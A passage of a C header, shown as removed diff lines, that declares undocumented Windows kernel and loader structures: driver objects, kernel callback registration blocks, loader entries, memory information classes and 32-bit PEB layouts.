- PVOID MdlReadComplete;
- PVOID PrepareMdlWrite;
- PVOID MdlWriteComplete;
- PVOID FastIoReadCompressed;
- PVOID FastIoWriteCompressed;
- PVOID MdlReadCompleteCompressed;
- PVOID MdlWriteCompleteCompressed;
- PVOID FastIoQueryOpen;
- PVOID ReleaseForModWrite;
- PVOID AcquireForCcFlush;
- PVOID ReleaseForCcFlush;
-} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;
-
-#define IO_TYPE_ADAPTER 0x00000001
-#define IO_TYPE_CONTROLLER 0x00000002
-#define IO_TYPE_DEVICE 0x00000003
-#define IO_TYPE_DRIVER 0x00000004
-#define IO_TYPE_FILE 0x00000005
-#define IO_TYPE_IRP 0x00000006
-#define IO_TYPE_MASTER_ADAPTER 0x00000007
-#define IO_TYPE_OPEN_PACKET 0x00000008
-#define IO_TYPE_TIMER 0x00000009
-#define IO_TYPE_VPB 0x0000000a
-#define IO_TYPE_ERROR_LOG 0x0000000b
-#define IO_TYPE_ERROR_MESSAGE 0x0000000c
-#define IO_TYPE_DEVICE_OBJECT_EXTENSION 0x0000000d
-
-#define IRP_MJ_CREATE 0x00
-#define IRP_MJ_CREATE_NAMED_PIPE 0x01
-#define IRP_MJ_CLOSE 0x02
-#define IRP_MJ_READ 0x03
-#define IRP_MJ_WRITE 0x04
-#define IRP_MJ_QUERY_INFORMATION 0x05
-#define IRP_MJ_SET_INFORMATION 0x06
-#define IRP_MJ_QUERY_EA 0x07
-#define IRP_MJ_SET_EA 0x08
-#define IRP_MJ_FLUSH_BUFFERS 0x09
-#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a
-#define IRP_MJ_SET_VOLUME_INFORMATION 0x0b
-#define IRP_MJ_DIRECTORY_CONTROL 0x0c
-#define IRP_MJ_FILE_SYSTEM_CONTROL 0x0d
-#define IRP_MJ_DEVICE_CONTROL 0x0e
-#define IRP_MJ_INTERNAL_DEVICE_CONTROL 0x0f
-#define IRP_MJ_SHUTDOWN 0x10
-#define IRP_MJ_LOCK_CONTROL 0x11
-#define IRP_MJ_CLEANUP 0x12
-#define IRP_MJ_CREATE_MAILSLOT 0x13
-#define IRP_MJ_QUERY_SECURITY 0x14
-#define IRP_MJ_SET_SECURITY 0x15
-#define IRP_MJ_POWER 0x16
-#define IRP_MJ_SYSTEM_CONTROL 0x17
-#define IRP_MJ_DEVICE_CHANGE 0x18
-#define IRP_MJ_QUERY_QUOTA 0x19
-#define IRP_MJ_SET_QUOTA 0x1a
-#define IRP_MJ_PNP 0x1b
-#define IRP_MJ_PNP_POWER IRP_MJ_PNP
-#define IRP_MJ_MAXIMUM_FUNCTION 0x1b
-
-typedef struct _DRIVER_EXTENSION {
-
- //
- // Back pointer to Driver Object
- //
-
- struct _DRIVER_OBJECT *DriverObject;
-
- //
- // The AddDevice entry point is called by the Plug & Play manager
- // to inform the driver when a new device instance arrives that this
- // driver must control.
- //
-
- PVOID AddDevice;
-
- //
- // The count field is used to count the number of times the driver has
- // had its registered reinitialization routine invoked.
- //
-
- ULONG Count;
-
- //
- // The service name field is used by the pnp manager to determine
- // where the driver related info is stored in the registry.
- //
-
- UNICODE_STRING ServiceKeyName;
-
-} DRIVER_EXTENSION, *PDRIVER_EXTENSION;
-
-#define DRVO_UNLOAD_INVOKED 0x00000001
-#define DRVO_LEGACY_DRIVER 0x00000002
-#define DRVO_BUILTIN_DRIVER 0x00000004 // Driver objects for Hal, PnP Mgr
-#define DRVO_REINIT_REGISTERED 0x00000008
-#define DRVO_INITIALIZED 0x00000010
-#define DRVO_BOOTREINIT_REGISTERED 0x00000020
-#define DRVO_LEGACY_RESOURCES 0x00000040
-// end_ntddk end_nthal end_ntifs end_ntosp
-#define DRVO_BASE_FILESYSTEM_DRIVER 0x00000080 // A driver that is at the bottom of the filesystem stack.
-// begin_ntddk begin_nthal begin_ntifs begin_ntosp
-
-typedef struct _DRIVER_OBJECT {
- CSHORT Type;
- CSHORT Size;
-
- //
- // The following links all of the devices created by a single driver
- // together on a list, and the Flags word provides an extensible flag
- // location for driver objects.
- //
-
- PDEVICE_OBJECT DeviceObject;
- ULONG Flags;
-
- //
- // The following section describes where the driver is loaded. The count
- // field is used to count the number of times the driver has had its
- // registered reinitialization routine invoked.
- //
-
- PVOID DriverStart;
- ULONG DriverSize;
- PVOID DriverSection; //PLDR_DATA_TABLE_ENTRY
- PDRIVER_EXTENSION DriverExtension;
-
- //
- // The driver name field is used by the error log thread
- // determine the name of the driver that an I/O request is/was bound.
- //
-
- UNICODE_STRING DriverName;
-
- //
- // The following section is for registry support. Thise is a pointer
- // to the path to the hardware information in the registry
- //
-
- PUNICODE_STRING HardwareDatabase;
-
- //
- // The following section contains the optional pointer to an array of
- // alternate entry points to a driver for "fast I/O" support. Fast I/O
- // is performed by invoking the driver routine directly with separate
- // parameters, rather than using the standard IRP call mechanism. Note
- // that these functions may only be used for synchronous I/O, and when
- // the file is cached.
- //
-
- PFAST_IO_DISPATCH FastIoDispatch;
-
- //
- // The following section describes the entry points to this particular
- // driver. Note that the major function dispatch table must be the last
- // field in the object so that it remains extensible.
- //
-
- PVOID DriverInit;
- PVOID DriverStartIo;
- PVOID DriverUnload;
- PVOID MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1];
-
-} DRIVER_OBJECT;
-typedef struct _DRIVER_OBJECT *PDRIVER_OBJECT;
-
-#define RESOURCE_TYPE_LEVEL 0
-#define RESOURCE_NAME_LEVEL 1
-#define RESOURCE_LANGUAGE_LEVEL 2
-#define RESOURCE_DATA_LEVEL 3
-
-typedef struct _LDR_RESOURCE_INFO {
- ULONG_PTR Type;
- ULONG_PTR Name;
- ULONG Lang;
-} LDR_RESOURCE_INFO, *PLDR_RESOURCE_INFO;
-
-typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {
- LIST_ENTRY InLoadOrderLinks;
- LIST_ENTRY InMemoryOrderLinks;
- union
- {
- LIST_ENTRY InInitializationOrderLinks;
- LIST_ENTRY InProgressLinks;
- } DUMMYUNION0;
- PVOID DllBase;
- PVOID EntryPoint;
- ULONG SizeOfImage;
- UNICODE_STRING FullDllName;
- UNICODE_STRING BaseDllName;
- union
- {
- ULONG Flags;
- struct
- {
- ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1
- ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1
- ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1
- ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1
- ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1
- ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1
- ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1
- ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1
- ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1
- ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1
- ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2
- ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1
- ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1
- ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1
- ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1
- ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2
- ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1
- ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1
- ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1
- ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1
- ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1
- ULONG DontRelocate : 1; // Size=4 Offset=104 BitOffset=23 BitCount=1
- ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1
- ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1
- ULONG ReservedFlags5 : 2; // Size=4 Offset=104 BitOffset=26 BitCount=2
- ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1
- ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2
- ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 BitOffset=31 BitCount=1
- };
- } ENTRYFLAGSUNION;
- WORD ObsoleteLoadCount;
- WORD TlsIndex;
- union
- {
- LIST_ENTRY HashLinks;
- struct
- {
- PVOID SectionPointer;
- ULONG CheckSum;
- };
- } DUMMYUNION1;
- union
- {
- ULONG TimeDateStamp;
- PVOID LoadedImports;
- } DUMMYUNION2;
- //fields below removed for compatibility
-} LDR_DATA_TABLE_ENTRY_COMPATIBLE, *PLDR_DATA_TABLE_ENTRY_COMPATIBLE;
-typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;
-typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE *PLDR_DATA_TABLE_ENTRY;
-typedef LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY;
-
-typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
- ULONG Flags; //Reserved.
- PCUNICODE_STRING FullDllName; //The full path name of the DLL module.
- PCUNICODE_STRING BaseDllName; //The base file name of the DLL module.
- PVOID DllBase; //A pointer to the base address for the DLL in memory.
- ULONG SizeOfImage; //The size of the DLL image, in bytes.
-} LDR_DLL_LOADED_NOTIFICATION_DATA, *PLDR_DLL_LOADED_NOTIFICATION_DATA;
-
-typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {
- ULONG Flags; //Reserved.
- PCUNICODE_STRING FullDllName; //The full path name of the DLL module.
- PCUNICODE_STRING BaseDllName; //The base file name of the DLL module.
- PVOID DllBase; //A pointer to the base address for the DLL in memory.
- ULONG SizeOfImage; //The size of the DLL image, in bytes.
-} LDR_DLL_UNLOADED_NOTIFICATION_DATA, *PLDR_DLL_UNLOADED_NOTIFICATION_DATA;
-
-typedef union _LDR_DLL_NOTIFICATION_DATA {
- LDR_DLL_LOADED_NOTIFICATION_DATA Loaded;
- LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;
-} LDR_DLL_NOTIFICATION_DATA, *PLDR_DLL_NOTIFICATION_DATA;
-typedef const LDR_DLL_NOTIFICATION_DATA *PCLDR_DLL_NOTIFICATION_DATA;
-
-#define LDR_DLL_NOTIFICATION_REASON_LOADED 1
-#define LDR_DLL_NOTIFICATION_REASON_UNLOADED 2
-
-typedef enum _LDR_DLL_LOAD_REASON {
- LoadReasonStaticDependency,
- LoadReasonStaticForwarderDependency,
- LoadReasonDynamicForwarderDependency,
- LoadReasonDelayloadDependency,
- LoadReasonDynamicLoad,
- LoadReasonAsImageLoad,
- LoadReasonAsDataLoad,
- LoadReasonEnclavePrimary,
- LoadReasonEnclaveDependency,
- LoadReasonUnknown = -1
-} LDR_DLL_LOAD_REASON, *PLDR_DLL_LOAD_REASON;
-
-/*
-* WDM END
-*/
-
-
-/*
-** Callbacks START
-*/
-
-typedef struct _EX_CALLBACK {
- EX_FAST_REF RoutineBlock;
-} EX_CALLBACK, *PEX_CALLBACK;
-
-typedef struct _EX_CALLBACK_ROUTINE_BLOCK {
- EX_RUNDOWN_REF RundownProtect;
- PVOID Function; //PEX_CALLBACK_FUNCTION
- PVOID Context;
-} EX_CALLBACK_ROUTINE_BLOCK, *PEX_CALLBACK_ROUTINE_BLOCK;
-
-typedef struct _KBUGCHECK_CALLBACK_RECORD {
- LIST_ENTRY Entry;
- PVOID CallbackRoutine;
- PVOID Buffer;
- ULONG Length;
- PUCHAR Component;
- ULONG_PTR Checksum;
- UCHAR State;
-} KBUGCHECK_CALLBACK_RECORD, *PKBUGCHECK_CALLBACK_RECORD;
-
-typedef enum _KBUGCHECK_CALLBACK_REASON {
- KbCallbackInvalid,
- KbCallbackReserved1,
- KbCallbackSecondaryDumpData,
- KbCallbackDumpIo,
- KbCallbackAddPages,
- KbCallbackSecondaryMultiPartDumpData,
- KbCallbackRemovePages,
- KbCallbackTriageDumpData
-} KBUGCHECK_CALLBACK_REASON;
-
-typedef struct _KBUGCHECK_REASON_CALLBACK_RECORD {
- LIST_ENTRY Entry;
- PVOID CallbackRoutine;
- PUCHAR Component;
- ULONG_PTR Checksum;
- KBUGCHECK_CALLBACK_REASON Reason;
- UCHAR State;
-} KBUGCHECK_REASON_CALLBACK_RECORD, *PKBUGCHECK_REASON_CALLBACK_RECORD;
-
-typedef struct _CM_CALLBACK_CONTEXT_BLOCK {
- LIST_ENTRY CallbackListEntry;
- LIST_ENTRY PreCallListHead;
- PVOID Unknown1;
- PVOID Function; //PEX_CALLBACK_FUNCTION
- UNICODE_STRING Altitude;
- LIST_ENTRY ObjectContextListHead;
-} CM_CALLBACK_CONTEXT_BLOCK, *PCM_CALLBACK_CONTEXT_BLOCK;
-
-typedef struct _SEP_LOGON_SESSION_TERMINATED_NOTIFICATION {
- struct _SEP_LOGON_SESSION_TERMINATED_NOTIFICATION *Next;
- PVOID CallbackRoutine; //PSE_LOGON_SESSION_TERMINATED_ROUTINE
-} SEP_LOGON_SESSION_TERMINATED_NOTIFICATION, *PSEP_LOGON_SESSION_TERMINATED_NOTIFICATION;
-
-typedef struct _NOTIFICATION_PACKET {
- LIST_ENTRY ListEntry;
- PVOID DriverObject; //PDRIVER_OBJECT
- PVOID NotificationRoutine; //PDRIVER_FS_NOTIFICATION
-} NOTIFICATION_PACKET, *PNOTIFICATION_PACKET;
-
-typedef struct _SHUTDOWN_PACKET {
- LIST_ENTRY ListEntry;
- PVOID DeviceObject; //PDEVICE_OBJECT
-} SHUTDOWN_PACKET, *PSHUTDOWN_PACKET;
-
-#define EX_CALLBACK_SIGNATURE 'llaC'
-
-typedef struct _CALLBACK_OBJECT {
- ULONG Signature;
- KSPIN_LOCK Lock;
- LIST_ENTRY RegisteredCallbacks;
- BOOLEAN AllowMultipleCallbacks;
- UCHAR reserved[3];
-} CALLBACK_OBJECT, *PCALLBACK_OBJECT;
-
-typedef struct _CALLBACK_REGISTRATION {
- LIST_ENTRY Link;
- PCALLBACK_OBJECT CallbackObject;
- PVOID CallbackFunction; //PCALLBACK_FUNCTION
- PVOID CallbackContext;
- ULONG Busy;
- BOOLEAN UnregisterWaiting;
-} CALLBACK_REGISTRATION, *PCALLBACK_REGISTRATION;
-
-typedef ULONG OB_OPERATION;
-
-typedef struct _OB_CALLBACK_CONTEXT_BLOCK {
- LIST_ENTRY CallbackListEntry;
- OB_OPERATION Operations;
- ULONG Flags;
- PVOID Registration; //POB_CALLBACK_REGISTRATION
- POBJECT_TYPE ObjectType;
- PVOID PreCallback; //POB_PRE_OPERATION_CALLBACK
- PVOID PostCallback; //POB_POST_OPERATION_CALLBACK
- EX_RUNDOWN_REF RundownReference;
-} OB_CALLBACK_CONTEXT_BLOCK, *POB_CALLBACK_CONTEXT_BLOCK;
-
-typedef struct _OB_OPERATION_REGISTRATION {
- PVOID *ObjectType;
- OB_OPERATION Operations;
- PVOID PreOperation;
- PVOID PostOperation;
-} OB_OPERATION_REGISTRATION, *POB_OPERATION_REGISTRATION;
-
-typedef struct _OB_CALLBACK_REGISTRATION {
- USHORT Version;
- USHORT OperationRegistrationCount;
- UNICODE_STRING Altitude;
- PVOID RegistrationContext;
- OB_OPERATION_REGISTRATION *OperationRegistration;
-} OB_CALLBACK_REGISTRATION, *POB_CALLBACK_REGISTRATION;
-
-#define PO_POWER_SETTINGS_REGISTRATION_TAG 'teSP'
-
-typedef struct _POP_POWER_SETTING_REGISTRATION_V1 {
- LIST_ENTRY Link;
- ULONG Tag;
- PVOID CallbackThread; //PKTHREAD
- UCHAR UnregisterOnReturn;
- UCHAR UnregisterPending;
- GUID Guid;
- PVOID LastValue; //PPOP_POWER_SETTING_VALUE
- PVOID Callback;
- PVOID Context;
- PDEVICE_OBJECT DeviceObject;
-} POP_POWER_SETTING_REGISTRATION_V1, *PPOP_POWER_SETTING_REGISTRATION_V1;
-
-//
-// WARNING: this structure definition is incomplete.
-// Tail is incorrect/incomplete for newest Win10 versions.
-//
-typedef struct _POP_POWER_SETTING_REGISTRATION_V2 {
- LIST_ENTRY Link;
- ULONG Tag;
- PVOID CallbackThread; //PKTHREAD
- UCHAR UnregisterOnReturn;
- UCHAR UnregisterPending;
- GUID Guid;
- GUID Guid2;
- PVOID LastValue; //PPOP_POWER_SETTING_VALUE
- PVOID Callback;
- PVOID Context;
- PDEVICE_OBJECT DeviceObject;
-} POP_POWER_SETTING_REGISTRATION_V2, *PPOP_POWER_SETTING_REGISTRATION_V2;
-
-typedef struct _RTL_CALLBACK_REGISTER {
- ULONG Flags;
- EX_RUNDOWN_REF RundownReference;
- PVOID DebugPrintCallback;
- LIST_ENTRY ListEntry;
-} RTL_CALLBACK_REGISTER, *PRTL_CALLBACK_REGISTER;
-
-/*
-** Callbacks END
-*/
-
-/*
-* NTQSI Modules START
-*/
-
-typedef struct _RTL_PROCESS_MODULE_INFORMATION {
- HANDLE Section;
- PVOID MappedBase;
- PVOID ImageBase;
- ULONG ImageSize;
- ULONG Flags;
- USHORT LoadOrderIndex;
- USHORT InitOrderIndex;
- USHORT LoadCount;
- USHORT OffsetToFileName;
- UCHAR FullPathName[256];
-} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
-
-typedef struct _RTL_PROCESS_MODULE_INFORMATION_EX {
- USHORT NextOffset;
- RTL_PROCESS_MODULE_INFORMATION BaseInfo;
- ULONG ImageChecksum;
- ULONG TimeDateStamp;
- PVOID DefaultBase;
-} RTL_PROCESS_MODULE_INFORMATION_EX, *PRTL_PROCESS_MODULE_INFORMATION_EX;
-
-typedef struct _RTL_PROCESS_MODULES {
- ULONG NumberOfModules;
- RTL_PROCESS_MODULE_INFORMATION Modules[1];
-} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
-
-/*
-* NTQSI Modules END
-*/
-
-/*
-** Virtual Memory START
-*/
-
-typedef enum _MEMORY_INFORMATION_CLASS {
- MemoryBasicInformation,
- MemoryWorkingSetInformation,
- MemoryMappedFilenameInformation,
- MemoryRegionInformation,
- MemoryWorkingSetExInformation,
- MemorySharedCommitInformation,
- MemoryImageInformation,
- MemoryRegionInformationEx,
- MemoryPrivilegedBasicInformation,
- MemoryEnclaveImageInformation,
- MemoryBasicInformationCapped
-} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;
-
-typedef enum _VIRTUAL_MEMORY_INFORMATION_CLASS {
- VmPrefetchInformation,
- VmPagePriorityInformation,
- VmCfgCallTargetInformation,
- VmPageDirtyStateInformation
-} VIRTUAL_MEMORY_INFORMATION_CLASS;
-
-typedef struct _MEMORY_REGION_INFORMATION {
- PVOID AllocationBase;
- ULONG AllocationProtect;
- union
- {
- ULONG RegionType;
- struct
- {
- ULONG Private : 1;
- ULONG MappedDataFile : 1;
- ULONG MappedImage : 1;
- ULONG MappedPageFile : 1;
- ULONG MappedPhysical : 1;
- ULONG DirectMapped : 1;
- ULONG SoftwareEnclave : 1;
- ULONG PageSize64K : 1;
- ULONG Reserved : 24;
- };
- };
- SIZE_T RegionSize;
- //SIZE_T CommitSize;
-} MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION;
-
-typedef struct _MEMORY_RANGE_ENTRY {
- PVOID VirtualAddress;
- SIZE_T NumberOfBytes;
-} MEMORY_RANGE_ENTRY, *PMEMORY_RANGE_ENTRY;
-
-/*
-** Virtual Memory END
-*/
-
-/*
-** System Firmware START
-*/
-
-typedef enum _SYSTEM_FIRMWARE_TABLE_ACTION {
- SystemFirmwareTable_Enumerate,
- SystemFirmwareTable_Get,
- SystemFirmwareTableMax
-} SYSTEM_FIRMWARE_TABLE_ACTION, *PSYSTEM_FIRMWARE_TABLE_ACTION;
-
-typedef struct _SYSTEM_FIRMWARE_TABLE_INFORMATION {
- ULONG ProviderSignature;
- SYSTEM_FIRMWARE_TABLE_ACTION Action;
- ULONG TableID;
- ULONG TableBufferLength;
- UCHAR TableBuffer[ANYSIZE_ARRAY];
-} SYSTEM_FIRMWARE_TABLE_INFORMATION, *PSYSTEM_FIRMWARE_TABLE_INFORMATION;
-
-/*
-** System Firmware END
-*/
-
-//
-// PEB/TEB
-//
-#define GDI_HANDLE_BUFFER_SIZE32 34
-#define GDI_HANDLE_BUFFER_SIZE64 60
-
-#if !defined(_M_X64)
-#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32
-#else
-#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64
-#endif
-
-typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
-typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
-typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
-
-#define RTL_MAX_DRIVE_LETTERS 32
-#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
-
-#define GDI_MAX_HANDLE_COUNT 0x4000
-
-// 32-bit definitions
-typedef struct _STRING32 {
- USHORT Length;
- USHORT MaximumLength;
- ULONG Buffer;
-} STRING32;
-typedef STRING32 *PSTRING32;
-
-typedef STRING32 UNICODE_STRING32;
-
-#if (_MSC_VER < 1300) && !defined(_WINDOWS_)
-typedef struct LIST_ENTRY32 {
- DWORD Flink;
- DWORD Blink;
-} LIST_ENTRY32;
-typedef LIST_ENTRY32 *PLIST_ENTRY32;
-
-typedef struct LIST_ENTRY64 {
- ULONGLONG Flink;
- ULONGLONG Blink;
-} LIST_ENTRY64;
-typedef LIST_ENTRY64 *PLIST_ENTRY64;
-#endif
-
-#define WOW64_POINTER(Type) ULONG
-
-typedef struct _PEB_LDR_DATA32 {
- ULONG Length;
- BOOLEAN Initialized;
- WOW64_POINTER(HANDLE) SsHandle;
- LIST_ENTRY32 InLoadOrderModuleList;
- LIST_ENTRY32 InMemoryOrderModuleList;
- LIST_ENTRY32 InInitializationOrderModuleList;
- WOW64_POINTER(PVOID) EntryInProgress;
- BOOLEAN ShutdownInProgress;
- WOW64_POINTER(HANDLE) ShutdownThreadId;
-} PEB_LDR_DATA32, *PPEB_LDR_DATA32;
-
-#define LDR_DATA_TABLE_ENTRY_SIZE_WINXP32 FIELD_OFFSET( LDR_DATA_TABLE_ENTRY32, ForwarderLinks )
-
-typedef struct _LDR_DATA_TABLE_ENTRY32 {
- LIST_ENTRY32 InLoadOrderLinks;
- LIST_ENTRY32 InMemoryOrderLinks;
- LIST_ENTRY32 InInitializationOrderLinks;
- WOW64_POINTER(PVOID) DllBase;
- WOW64_POINTER(PVOID) EntryPoint;
- ULONG SizeOfImage;
- UNICODE_STRING32 FullDllName;
- UNICODE_STRING32 BaseDllName;
- ULONG Flags;
- USHORT LoadCount;
- USHORT TlsIndex;
- union
- {
- LIST_ENTRY32 HashLinks;
- struct
- {
- WOW64_POINTER(PVOID) SectionPointer;
- ULONG CheckSum;
- };
- };
- union
- {
- ULONG TimeDateStamp;
- WOW64_POINTER(PVOID) LoadedImports;
- };
- WOW64_POINTER(PVOID) EntryPointActivationContext;
- WOW64_POINTER(PVOID) PatchInformation;
- LIST_ENTRY32 ForwarderLinks;
- LIST_ENTRY32 ServiceTagLinks;
- LIST_ENTRY32 StaticLinks;
- WOW64_POINTER(PVOID) ContextInformation;
- WOW64_POINTER(ULONG_PTR) OriginalBase;
- LARGE_INTEGER LoadTime;
-} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32;
-
-typedef struct _CURDIR32 {
- UNICODE_STRING32 DosPath;
- WOW64_POINTER(HANDLE) Handle;
-} CURDIR32, *PCURDIR32;
-
-typedef struct _RTL_DRIVE_LETTER_CURDIR32 {
- USHORT Flags;
- USHORT Length;
- ULONG TimeStamp;
- STRING32 DosPath;
-} RTL_DRIVE_LETTER_CURDIR32, *PRTL_DRIVE_LETTER_CURDIR32;
-
-typedef struct _RTL_USER_PROCESS_PARAMETERS32 {
- ULONG MaximumLength;
- ULONG Length;
-
- ULONG Flags;
- ULONG DebugFlags;
-
- WOW64_POINTER(HANDLE) ConsoleHandle;
- ULONG ConsoleFlags;
- WOW64_POINTER(HANDLE) StandardInput;
- WOW64_POINTER(HANDLE) StandardOutput;
- WOW64_POINTER(HANDLE) StandardError;
-
- CURDIR32 CurrentDirectory;
- UNICODE_STRING32 DllPath;
- UNICODE_STRING32 ImagePathName;
- UNICODE_STRING32 CommandLine;
- WOW64_POINTER(PVOID) Environment;
-
- ULONG StartingX;
- ULONG StartingY;
- ULONG CountX;
- ULONG CountY;
- ULONG CountCharsX;
- ULONG CountCharsY;
- ULONG FillAttribute;
-
- ULONG WindowFlags;
- ULONG ShowWindowFlags;
- UNICODE_STRING32 WindowTitle;
- UNICODE_STRING32 DesktopInfo;
- UNICODE_STRING32 ShellInfo;
- UNICODE_STRING32 RuntimeData;
- RTL_DRIVE_LETTER_CURDIR32 CurrentDirectories[RTL_MAX_DRIVE_LETTERS];
-
- ULONG EnvironmentSize;
- ULONG EnvironmentVersion;
-} RTL_USER_PROCESS_PARAMETERS32, *PRTL_USER_PROCESS_PARAMETERS32;
-
-typedef struct _PEB32 {
- BOOLEAN InheritedAddressSpace;
- BOOLEAN ReadImageFileExecOptions;
- BOOLEAN BeingDebugged;
- union
- {
- BOOLEAN BitField;
- struct
- {
- BOOLEAN ImageUsesLargePages : 1;
- BOOLEAN IsProtectedProcess : 1;
- BOOLEAN IsLegacyProcess : 1;
- BOOLEAN IsImageDynamicallyRelocated : 1;
- BOOLEAN SkipPatchingUser32Forwarders : 1;
- BOOLEAN SpareBits : 3;
- };
- };
- WOW64_POINTER(HANDLE) Mutant;
-
- WOW64_POINTER(PVOID) ImageBaseAddress;
- WOW64_POINTER(PPEB_LDR_DATA) Ldr;
- WOW64_POINTER(PRTL_USER_PROCESS_PARAMETERS) ProcessParameters;
- WOW64_POINTER(PVOID) SubSystemData;
- WOW64_POINTER(PVOID) ProcessHeap;
- WOW64_POINTER(PRTL_CRITICAL_SECTION) FastPebLock;
- WOW64_POINTER(PVOID) AtlThunkSListPtr;
- WOW64_POINTER(PVOID) IFEOKey;
- union
- {
- ULONG CrossProcessFlags;
- struct
- {
- ULONG ProcessInJob : 1;
- ULONG ProcessInitializing : 1;
- ULONG ProcessUsingVEH : 1;
- ULONG ProcessUsingVCH : 1;
- ULONG ProcessUsingFTH : 1;
- ULONG ProcessPreviouslyThrottled : 1;
- ULONG ProcessCurrentlyThrottled : 1;
- ULONG ReservedBits0 : 25;
- };
- ULONG EnvironmentUpdateCount;
- };
- union
- {
- WOW64_POINTER(PVOID) KernelCallbackTable;
- WOW64_POINTER(PVOID) UserSharedInfoPtr;
- };
- ULONG SystemReserved[1];
- ULONG AtlThunkSListPtr32;
- WOW64_POINTER(PVOID) ApiSetMap;
- ULONG TlsExpansionCounter;
- WOW64_POINTER(PVOID) TlsBitmap;
- ULONG TlsBitmapBits[2];
- WOW64_POINTER(PVOID) ReadOnlySharedMemoryBase;
- WOW64_POINTER(PVOID) HotpatchInformation;
- WOW64_POINTER(PPVOID) ReadOnlyStaticServerData;
- WOW64_POINTER(PVOID) AnsiCodePageData;
- WOW64_POINTER(PVOID) OemCodePageData;
- WOW64_POINTER(PVOID) UnicodeCaseTableData;
-
- ULONG NumberOfProcessors;
- ULONG NtGlobalFlag;
-
- LARGE_INTEGER CriticalSectionTimeout;
- WOW64_POINTER(SIZE_T) HeapSegmentReserve;
- WOW64_POINTER(SIZE_T) HeapSegmentCommit;
- WOW64_POINTER(SIZE_T) HeapDeCommitTotalFreeThreshold;
- WOW64_POINTER(SIZE_T) HeapDeCommitFreeBlockThreshold;
-
- ULONG NumberOfHeaps;
- ULONG MaximumNumberOfHeaps;
- WOW64_POINTER(PPVOID) ProcessHeaps;
-
- WOW64_POINTER(PVOID) GdiSharedHandleTable;
- WOW64_POINTER(PVOID) ProcessStarterHelper;
- ULONG GdiDCAttributeList;
-
- WOW64_POINTER(PRTL_CRITICAL_SECTION) LoaderLock;
-
- ULONG OSMajorVersion;
- ULONG OSMinorVersion;
- USHORT OSBuildNumber;
- USHORT OSCSDVersion;
- ULONG OSPlatformId;
- ULONG ImageSubsystem;
- ULONG ImageSubsystemMajorVersion;
- ULONG ImageSubsystemMinorVersion;
- WOW64_POINTER(ULONG_PTR) ImageProcessAffinityMask;
- GDI_HANDLE_BUFFER32 GdiHandleBuffer;
- WOW64_POINTER(PVOID) PostProcessInitRoutine;
-
- WOW64_POINTER(PVOID) TlsExpansionBitmap;
- ULONG TlsExpansionBitmapBits[32];
-
- ULONG SessionId;
-
- // Rest of structure not included.
-} PEB32, *PPEB32;
-
-#define GDI_BATCH_BUFFER_SIZE 310
-
-typedef struct _GDI_TEB_BATCH32 {
- ULONG Offset;
- WOW64_POINTER(ULONG_PTR) HDC;
- ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
-} GDI_TEB_BATCH32, *PGDI_TEB_BATCH32;
-
-#if (_MSC_VER < 1300) && !defined(_WINDOWS_)
-//
-// 32 and 64 bit specific version for wow64 and the debugger
-//
-typedef struct _NT_TIB32 {
- DWORD ExceptionList;
- DWORD StackBase;
- DWORD StackLimit;
- DWORD SubSystemTib;
- union {
- DWORD FiberData;
- DWORD Version;
- };
